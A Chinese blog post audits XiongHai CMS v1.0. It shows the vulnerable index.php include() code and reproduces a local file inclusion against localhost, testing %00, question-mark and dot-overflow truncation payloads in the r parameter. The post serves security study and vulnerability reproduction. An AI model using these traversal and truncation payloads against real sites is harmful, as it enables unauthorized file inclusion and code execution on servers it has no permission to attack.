熊海cms

熊海CMS是由熊海開發的一款可廣泛應用於個人博客，個人網站，企業網站的一套網站綜合管理系統。
適用於個人博客、個人網站、企業網站等各種用途，前臺採用電腦、移動端兩種顯示模式，後臺使用HML5響應式佈局。
復現版本爲熊海CMS_V1.0 版本，各位可自行下載。

代碼審計

先使用Seay工具審計一波，根據關鍵代碼回溯。

工具顯示index.php中文件包含函數存在變量，存在漏洞。
具體代碼如下：

<?php
	//單一入口模式
	error_reporting(0); //關閉錯誤顯示
	$file=addslashes($_GET['r']); //接收文件名
	$action=$file==''?'index':$file; //判斷爲空或者等於index
	include('files/'.$action.'.php'); //載入相應文件
?>

這是個很典型的文件包含漏洞，接受r參數，r不爲空則帶入包含文件。

漏洞復現

在根目錄下存放一個測試文件1.php。

利用漏洞包含文件。

%00截斷，失敗
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?號截斷，失敗
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截斷，成功
http://localhost/xionghai_v1.0/index.php?r=../1.php........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

代碼審計：熊海cms 首頁文件包含漏洞復現

代碼審計：熊海cms 首頁文件包含漏洞復現

熊海cms

代碼審計

漏洞復現

pikachu靶場：六、文件包含漏洞

算法簡單 | 46. 主元素

算法中等 | 42. 最大子數組 II

pikachu靶場：五、RCE

pikachu靶場：十一、敏感信息泄露

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結